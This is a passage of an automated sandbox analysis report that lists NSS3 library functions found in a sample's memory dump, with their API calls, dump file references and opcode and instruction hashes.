                                                                                                                                                                                                                          • SECITEM_AllocItem_Util.NSS3(?,?,00000002,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6C4CBEEB
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Util$Item_$CopyError$AllocAlloc_ArenaFindTag_memcpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1367977078-0
                                                                                                                                                                                                                          • Opcode ID: f1b67ade3d5cf8085e025b4fa9cc4ed7ec3452d35d0e67ef7d4996e844efd303
                                                                                                                                                                                                                          • Instruction ID: ab2c2be9772e236b6143e70a005437e47bdafe2eb4cfcf9abd24b3cec9ea5c4f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f1b67ade3d5cf8085e025b4fa9cc4ed7ec3452d35d0e67ef7d4996e844efd303
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9711EFAEB0465567E700C965AC80F6B776D9B80B9AF044125FE04C7B72E721D80486E3
                                                                                                                                                                                                                          Function 6C47AD90 Relevance: 7.6, APIs: 5, Instructions: 72memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PORT_ArenaMark_Util.NSS3(00000000,?,6C473FFF,00000000,?,?,?,?,?,6C471A1C,00000000,00000000), ref: 6C47ADA7
                                                                                                                                                                                                                            • Part of subcall function 6C4D14C0: TlsGetValue.KERNEL32 ref: 6C4D14E0
                                                                                                                                                                                                                            • Part of subcall function 6C4D14C0: EnterCriticalSection.KERNEL32 ref: 6C4D14F5
                                                                                                                                                                                                                            • Part of subcall function 6C4D14C0: PR_Unlock.NSS3 ref: 6C4D150D
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6C473FFF,00000000,?,?,?,?,?,6C471A1C,00000000,00000000), ref: 6C47ADB4
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
                                                                                                                                                                                                                          • SECITEM_CopyItem_Util.NSS3(00000000,?,6C473FFF,?,?,?,?,6C473FFF,00000000,?,?,?,?,?,6C471A1C,00000000), ref: 6C47ADD5
                                                                                                                                                                                                                            • Part of subcall function 6C4CFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C4C8D2D,?,00000000,?), ref: 6C4CFB85
                                                                                                                                                                                                                            • Part of subcall function 6C4CFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C4CFBB1
                                                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C5994B0,?,?,?,?,?,?,?,?,6C473FFF,00000000,?), ref: 6C47ADEC
                                                                                                                                                                                                                            • Part of subcall function 6C4CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C5A18D0,?), ref: 6C4CB095
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C473FFF), ref: 6C47AE3C
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2372449006-0
                                                                                                                                                                                                                          • Opcode ID: 7baf1a6f5bcf1fe517cdf2a783e24f8dcbf2e658b7ddfa6edc5a92eb73b341a1
                                                                                                                                                                                                                          • Instruction ID: d2e5103eb81cf54c8e6015b8f7604ffc411613f053b59e58ee46a999982467ab
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7baf1a6f5bcf1fe517cdf2a783e24f8dcbf2e658b7ddfa6edc5a92eb73b341a1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2B110371E002045BE720EA659C51FFF73B8DF9125EF04462CEC1996B41FB20E95882E2
                                                                                                                                                                                                                          Function 6C4C8800 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,6C4D085A,00000000,?,6C478369,?), ref: 6C4C8821
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,6C4D085A,00000000,?,6C478369,?), ref: 6C4C883D
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,6C4D085A,00000000,?,6C478369,?), ref: 6C4C8856
                                                                                                                                                                                                                          • PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C4C8887
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,6C4D085A,00000000,?,6C478369,?), ref: 6C4C8899
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607AD
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607CD
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607D6
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C3F204A), ref: 6C4607E4
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,6C3F204A), ref: 6C460864
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C460880
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,6C3F204A), ref: 6C4608CB
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(?,?,6C3F204A), ref: 6C4608D7
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(?,?,6C3F204A), ref: 6C4608FB
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Value$calloc$CondCriticalEnterSectionUnlockWait
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2759447159-0
                                                                                                                                                                                                                          • Opcode ID: 574ae6e5f19e8e9c36c14327f7d3be5f2ae24ac78b80e3f196f02fa4770ef9f4
                                                                                                                                                                                                                          • Instruction ID: 6963236ddda4e214036d55c625ea72ba7a5e0ded6c1e85f8c3ed32d6c2428bac
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 574ae6e5f19e8e9c36c14327f7d3be5f2ae24ac78b80e3f196f02fa4770ef9f4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E62171B8A04605CFDB00EF78C884D6AB7B4FF05309F11466ADC9496B15E730E995CBA6
                                                                                                                                                                                                                          Function 6C4CF860 Relevance: 7.6, APIs: 5, Instructions: 65memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000800), ref: 6C4CF893
                                                                                                                                                                                                                            • Part of subcall function 6C4D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C4787ED,00000800,6C46EF74,00000000), ref: 6C4D1000
                                                                                                                                                                                                                            • Part of subcall function 6C4D0FF0: PR_NewLock.NSS3(?,00000800,6C46EF74,00000000), ref: 6C4D1016
                                                                                                                                                                                                                            • Part of subcall function 6C4D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C4787ED,00000008,?,00000800,6C46EF74,00000000), ref: 6C4D102B
                                                                                                                                                                                                                          • SECITEM_CopyItem_Util.NSS3(00000000,?,6C4866A0), ref: 6C4CF8AA
                                                                                                                                                                                                                            • Part of subcall function 6C4CFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C4C8D2D,?,00000000,?), ref: 6C4CFB85
                                                                                                                                                                                                                            • Part of subcall function 6C4CFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C4CFBB1
                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C4CF8B9
                                                                                                                                                                                                                            • Part of subcall function 6C4D1200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C4788A4,00000000,00000000), ref: 6C4D1228
                                                                                                                                                                                                                            • Part of subcall function 6C4D1200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C4D1238
                                                                                                                                                                                                                            • Part of subcall function 6C4D1200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C4788A4,00000000,00000000), ref: 6C4D124B
                                                                                                                                                                                                                            • Part of subcall function 6C4D1200: PR_CallOnce.NSS3(6C5D2AA4,6C4D12D0,00000000,00000000,00000000,?,6C4788A4,00000000,00000000), ref: 6C4D125D
                                                                                                                                                                                                                            • Part of subcall function 6C4D1200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C4D126F
                                                                                                                                                                                                                            • Part of subcall function 6C4D1200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C4D1280
                                                                                                                                                                                                                            • Part of subcall function 6C4D1200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C4D128E
                                                                                                                                                                                                                            • Part of subcall function 6C4D1200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C4D129A
                                                                                                                                                                                                                            • Part of subcall function 6C4D1200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C4D12A1
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,00000028), ref: 6C4CF8D9
                                                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C5A18E0), ref: 6C4CF905
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Util$Arena$Pool$Alloc_Arena_CriticalFreeItem_Sectionfree$CallClearCopyDecodeDeleteEnterInitLockOnceQuickUnlockValuecallocmemcpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3757084236-0
                                                                                                                                                                                                                          • Opcode ID: 7ebbc7736865809c0c89126db468caa79b94a4f75f52fbfcafbd9aed56b2e956
                                                                                                                                                                                                                          • Instruction ID: 8320ece035ad6f9b0ad77ebfb265c9857967d14e0b51760801d08d260bc29769
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7ebbc7736865809c0c89126db468caa79b94a4f75f52fbfcafbd9aed56b2e956
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D110476F013006BF300DB259D41F6B7AE89B85698F01412DEC148B791FB75D50883E3
                                                                                                                                                                                                                          Function 6C488FE0 Relevance: 7.6, APIs: 5, Instructions: 63threadCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_GetThreadPrivate.NSS3(FFFFFFFF,?,6C490710), ref: 6C488FF1
                                                                                                                                                                                                                          • PR_CallOnce.NSS3(6C5D2158,6C489150,00000000,?,?,?,6C489138,?,6C490710), ref: 6C489029
                                                                                                                                                                                                                          • calloc.MOZGLUE(00000001,00000000,?,?,6C490710), ref: 6C48904D
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,00000000,00000000,?,?,?,?,6C490710), ref: 6C489066
                                                                                                                                                                                                                          • PR_SetThreadPrivate.NSS3(00000000,?,?,?,?,6C490710), ref: 6C489078
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: PrivateThread$CallOncecallocmemcpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1176783091-0
                                                                                                                                                                                                                          • Opcode ID: 4a00bc9e868268381df71f727941d5aa0f3619ea34ac8a5daed95d9a7db2ef9e
                                                                                                                                                                                                                          • Instruction ID: 1dd691c671402ce6473c33a2dba8d20b8a5e8eab85e9fc1314ec3e950e949eba
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4a00bc9e868268381df71f727941d5aa0f3619ea34ac8a5daed95d9a7db2ef9e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BC112571702611A7EB109AADAC04E6A32B8DBD37AEF410021FC44D6B41F753CD45D3E9
                                                                                                                                                                                                                          Function 6C49CD80 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 6C4B1E10: TlsGetValue.KERNEL32 ref: 6C4B1E36
                                                                                                                                                                                                                            • Part of subcall function 6C4B1E10: EnterCriticalSection.KERNEL32(?,?,?,6C48B1EE,2404110F,?,?), ref: 6C4B1E4B
                                                                                                                                                                                                                            • Part of subcall function 6C4B1E10: PR_Unlock.NSS3 ref: 6C4B1E76
                                                                                                                                                                                                                          • free.MOZGLUE(?,6C49D079,00000000,00000001), ref: 6C49CDA5
                                                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(?,6C49D079,00000000,00000001), ref: 6C49CDB6
                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000001,6C49D079,00000000,00000001), ref: 6C49CDCF
                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?,6C49D079,00000000,00000001), ref: 6C49CDE2
                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C49CDE9
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1720798025-0
                                                                                                                                                                                                                          • Opcode ID: ca9c92290d79d282b163d4c3d6714e3efc47684c6e1964a1283a97144e8886bc
                                                                                                                                                                                                                          • Instruction ID: f50506942599283d39f39aa7f748cf5e1143ee77b6f5011a922901c387afe0eb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ca9c92290d79d282b163d4c3d6714e3efc47684c6e1964a1283a97144e8886bc
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 951102B2B01521ABEF00EEA5EC44D96BB2DFF0425A7000225E90997E11E332F534C7E1
                                                                                                                                                                                                                          Function 6C502CC0 Relevance: 7.6, APIs: 5, Instructions: 55COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 6C505B40: PR_GetIdentitiesLayer.NSS3 ref: 6C505B56
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C502CEC
                                                                                                                                                                                                                            • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3(?), ref: 6C502D02
                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3(?), ref: 6C502D1F
                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6C502D42
                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6C502D5B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1593528140-0
                                                                                                                                                                                                                          • Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
                                                                                                                                                                                                                          • Instruction ID: 631d4fc9a4ffd91310cd5d46b4db2694e9dcc4dee6cdd6649fa00f2a952327f4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 020165F6A142009BE7309E25FC45B87B7A5EB95318F004525E95DC6B20F632FD16C692
                                                                                                                                                                                                                          Function 6C502D70 Relevance: 7.6, APIs: 5, Instructions: 55COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 6C505B40: PR_GetIdentitiesLayer.NSS3 ref: 6C505B56
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C502D9C
                                                                                                                                                                                                                            • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3(?), ref: 6C502DB2
                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3(?), ref: 6C502DCF
                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6C502DF2
                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6C502E0B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1593528140-0
                                                                                                                                                                                                                          • Opcode ID: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
                                                                                                                                                                                                                          • Instruction ID: e17366f2c83853173c258f244718ddbd8b343a848a70142d6e375df3be6afcfe
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4001A1F2A406009BEB309E26FC05BC7B7A5EB81318F040435E85EC6B20F632FC25C692
                                                                                                                                                                                                                          Function 6C49AE30 Relevance: 7.6, APIs: 5, Instructions: 54COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 6C483090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C49AE42), ref: 6C4830AA
                                                                                                                                                                                                                            • Part of subcall function 6C483090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C4830C7
                                                                                                                                                                                                                            • Part of subcall function 6C483090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C4830E5
                                                                                                                                                                                                                            • Part of subcall function 6C483090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C483116
                                                                                                                                                                                                                            • Part of subcall function 6C483090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C48312B
                                                                                                                                                                                                                            • Part of subcall function 6C483090: PK11_DestroyObject.NSS3(?,?), ref: 6C483154
                                                                                                                                                                                                                            • Part of subcall function 6C483090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C48317E
                                                                                                                                                                                                                          • SECKEY_DestroyPublicKey.NSS3(00000000,?,00000000,?,6C4799FF,?,?,?,?,?,?,?,?,?,6C472D6B,?), ref: 6C49AE67
                                                                                                                                                                                                                          • SECITEM_DupItem_Util.NSS3(-00000014,?,00000000,?,6C4799FF,?,?,?,?,?,?,?,?,?,6C472D6B,?), ref: 6C49AE7E
